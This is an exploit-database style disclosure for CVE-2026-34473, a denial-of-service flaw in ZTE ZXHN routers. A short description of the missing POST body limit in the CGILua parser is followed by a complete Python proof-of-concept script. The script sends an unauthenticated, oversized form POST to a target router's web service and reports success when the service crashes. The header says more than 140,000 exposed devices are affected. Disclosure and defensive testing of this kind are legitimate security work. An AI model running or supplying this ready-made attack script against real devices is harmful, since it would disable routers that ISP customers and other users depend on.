# Exploit Title: ZTE Routers - Unauthenticated Denial of Service
# Date: 2026-05-20
# Exploit Author: Mina Nageh Salalma (Monx Research)
# Vendor Homepage: https://www.zte.com.cn
# Software Link:
https://github.com/minanagehsalalma/cve-2026-34473-unauthenticated-dos-zte-routers
# Version: Multiple ZTE router models (17+ confirmed)
# Tested on: Multiple ZTE ZXHN models; estimated 140,000+ publicly exposed
devices
# CVE: CVE-2026-34473
# Description:
# The CGILua post.lua parser in 17+ ZTE router models does not enforce a
# maximum body size for application/x-www-form-urlencoded POST requests.
# An unauthenticated attacker can crash or freeze the router's web service
# by sending a single oversized POST request to any CGI endpoint.
# No authentication, session, or credentials are required.
#
# Affected: 17+ ZTE ZXHN router models deployed by ISPs worldwide.
# Estimated 140,000+ publicly reachable devices at time of research.
#
# MITRE CVE: https://www.cve.org/CVERecord?id=CVE-2026-34473
# PoC (Python 3)
import requests
import sys
def dos_exploit(target, size_kb=256):
"""
CVE-2026-34473 - Unauthenticated DoS
Sends oversized POST body to crash ZTE CGILua web service.
"""
url = f"http://{target}/cgi-bin/luci"
payload = "a=" + "A" * (size_kb * 1024)
headers = {"Content-Type": "application/x-www-form-urlencoded"}
try:
r = requests.post(url, data=payload, headers=headers, timeout=15)
print(f"[+] {target} responded with HTTP {r.status_code} (device
may still be up)")
except requests.exceptions.ConnectionError:
print(f"[!] {target} - Connection refused or dropped: device web
service likely crashed (DoS successful)")
except requests.exceptions.Timeout:
print(f"[!] {target} - Timeout: device web service unresponsive
(DoS successful)")
except Exception as e:
print(f"[-] {target}: {e}")
if __name__ == "__main__":
if len(sys.argv) < 2:
print("Usage: poc.py <target_ip> [payload_size_kb]")
sys.exit(1)
size = int(sys.argv[2]) if len(sys.argv) > 2 else 256
dos_exploit(sys.argv[1], size)
